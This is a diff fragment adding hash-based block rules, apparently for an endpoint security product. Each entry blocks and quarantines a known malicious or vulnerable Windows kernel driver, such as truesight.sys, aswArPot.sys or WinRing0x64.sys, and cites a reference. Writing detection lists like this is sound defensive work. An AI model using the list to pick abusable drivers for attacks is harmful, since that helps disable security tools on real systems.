+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "966cc215b2b8eb69aab3393114a10b7e07ba83df5b2587cb47fd3b172a3fa7cb",
+ "comment": "Malicious Kernel Driver (aka driver_312c83a9.sys) [https://www.loldrivers.io/drivers/495f0f36-c5e0-467d-8115-b5bdbe7ff686/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7830904f-3bea-5bd3-b2a1-0670d96b8abd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.815832Z",
+ "creation_date": "2026-03-23T11:45:31.815834Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.815840Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7d15fdcd606dc03b61badd7cacba1a62ddab3aa5acc174bc4b3573beec377591",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "784639c3-8701-54cc-87a4-4514b6953fc5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.828459Z",
+ "creation_date": "2026-03-23T11:45:31.828461Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.828467Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "045365894e5d26b620eff819cce3f823e114f7b25ed1cd50b870bf81444bbe8c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7846edc1-3f02-5bd5-b92f-8ebae75947fa",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.155632Z",
+ "creation_date": "2026-03-23T11:45:31.155634Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.155639Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4f0a2ac804c356a80313aa31dcc9c486cfd9078df64b65017d74be395d6cb9ec",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "784c165f-1e92-52c6-bd1e-108bd18b4df6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.975913Z",
+ "creation_date": "2026-03-23T11:45:29.975915Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.975921Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2ff09bb919a9909068166c30322c4e904befeba5429e9a11d011297fb8a73c07",
+ "comment": "Gigabyte vulnerable driver (aka GVCIDrv64.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "78595590-0f19-5b92-bf1a-74742f1f44f4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.977916Z",
+ "creation_date": "2026-03-23T11:45:29.977919Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.977924Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a8c558e74ebe35a095a5b79d4bb26c10b18f8ebb449365e742f856d4e032555c",
+ "comment": "Malicious Kernel Driver (aka daxin_blank6.sys) [https://www.loldrivers.io/drivers/3d1439e9-9a7d-497a-8c6c-74513f825d6a/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "785dbe37-862e-5e72-a198-c01f0b51e93a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.816935Z",
+ "creation_date": "2026-03-23T11:45:31.816939Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.816955Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "001bdb1e584eede0b46a7fb21e678303e2370b2b176ecd7bba803d0afc2b244c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "78685f2a-35d1-5a09-bdee-24c61ed9963c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.831145Z",
+ "creation_date": "2026-03-23T11:45:30.831147Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.831152Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f8a387b02f003e7a45f5e4a99fe2a52dc239e6e7f77383eb97e477ace0808f79",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "786d4b1a-9a1f-550b-943a-037be644c7ec",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.979709Z",
+ "creation_date": "2026-03-23T11:45:29.979711Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.979716Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dd759c6b9c4222c7b19e8b0ba7288d7395594d6884b9bcdf0ccfada3e6b7a8d5",
+ "comment": "Malicious Kernel Driver (aka windbg.sys) [https://www.loldrivers.io/drivers/da7314dc-6cf1-4d74-a0d1-796fc08944f8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7874a311-e4b6-538d-acdc-63f401b6d801",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.818399Z",
+ "creation_date": "2026-03-23T11:45:30.818401Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.818406Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "065a34b786b0ccf6f88c136408943c3d2bd3da14357ee1e55e81e05d67a4c9bc",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "787e30d4-7582-5d2f-b193-c77fa09b8ddd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.969116Z",
+ "creation_date": "2026-03-23T11:45:29.969118Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.969123Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "17687cba00ec2c9036dd3cb5430aa1f4851e64990dafb4c8f06d88de5283d6ca",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7888a8d3-bdd8-533b-b862-c33714323e6f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.453343Z",
+ "creation_date": "2026-03-23T11:45:30.453346Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.453355Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "84739539aa6a9c9cb3c48c53f9399742883f17f24e081ebfa7bfaaf59f3ed451",
+ "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "788cc8a2-8204-5039-99d8-10fa825d98ce",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.146601Z",
+ "creation_date": "2026-03-23T11:45:32.146603Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.146608Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1df739ca8e7763776f84b421c7859fccb2fbfd47cf27f9980f646597f5ae7836",
+ "comment": "Malicious Kernel Driver (aka driver_89036534.sys) [https://www.loldrivers.io/drivers/750a8aa9-a87c-4142-b96b-18ea139ada14/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "789a395a-0cbc-5aa1-ac63-97d2ec542285",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.812756Z",
+ "creation_date": "2026-03-23T11:45:31.812759Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.812767Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "01ac08508f5e8224d00cee894d551ba032fb0c4f72addba4154b6d1fc710a25b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "78a649d6-5538-51fd-b671-49800400722b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.974783Z",
+ "creation_date": "2026-03-23T11:45:29.974785Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.974791Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6bdf465db8860c80051d4d1b9db1c3153ab65c252f9500b85efc56d255b4cb1d",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "78aeb5c2-d17d-5edc-889a-d5eb1ba8c4e3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.980993Z",
+ "creation_date": "2026-03-23T11:45:29.980995Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.981065Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e89afd283d5789b8064d5487e04b97e2cd3fc0c711a8cec230543ebdf9ffc534",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "78c0cf7d-5d08-501e-9259-31f7b1ca041b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.614614Z",
+ "creation_date": "2026-03-23T11:45:29.614616Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.614621Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5d530e111400785d183057113d70623e17af32931668ab7c7fc826f0fd4f91a3",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "78c61919-9a0b-5031-8ba3-43d90e666e9f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.159849Z",
+ "creation_date": "2026-03-23T11:45:31.159852Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.159858Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bc97e34326627da82b7c070491e018890190ad14224b153c4fca107eca0ff998",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "78cebc51-b13f-57fc-8f28-f657eeef5792",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.825540Z",
+ "creation_date": "2026-03-23T11:45:30.825542Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.825548Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "314d5dbb5fcd4feb7560a129fc7167718d59e11c40586f2342e03a282910ec2e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "78d60d9b-5b21-549c-952b-0eb293816811",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.617272Z",
+ "creation_date": "2026-03-23T11:45:29.617274Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.617279Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9305f0834e67aa16fb252bd30927e5f835639ef4b868f20d232260edffefd6f0",
+ "comment": "Noriyuki MIYAZAKI's WinRing0 dangerous driver (aka WinRing0x64.sys) [CVE-2020-14979] [https://www.loldrivers.io/drivers/f0fd5bc6-9ebd-4eb0-93ce-9256a5b9abf9/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "78de01de-0931-5b75-a54a-ed0d0908936a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.835176Z",
+ "creation_date": "2026-03-23T11:45:30.835179Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.835189Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5f37c74b4ef7804653d9c1aa12237c3b01caa297544db5e0b4cdb90e5f5a8be8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "78e444a6-050d-5276-88c2-f959ba6f201d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.156904Z",
+ "creation_date": "2026-03-23T11:45:31.156906Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.156911Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5bfc2787dc5265a1c260409f6c42639c7aeed978924f4924f7c695083b184c30",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "78ef95d4-b94a-55a1-b9c8-753438d31203",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.605267Z",
+ "creation_date": "2026-03-23T11:45:29.605269Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.605274Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "594b3e2ce945a7db3a16ef23da39997ddc12337266ecf8ad326ffcf2c4ee1bc8",
+ "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
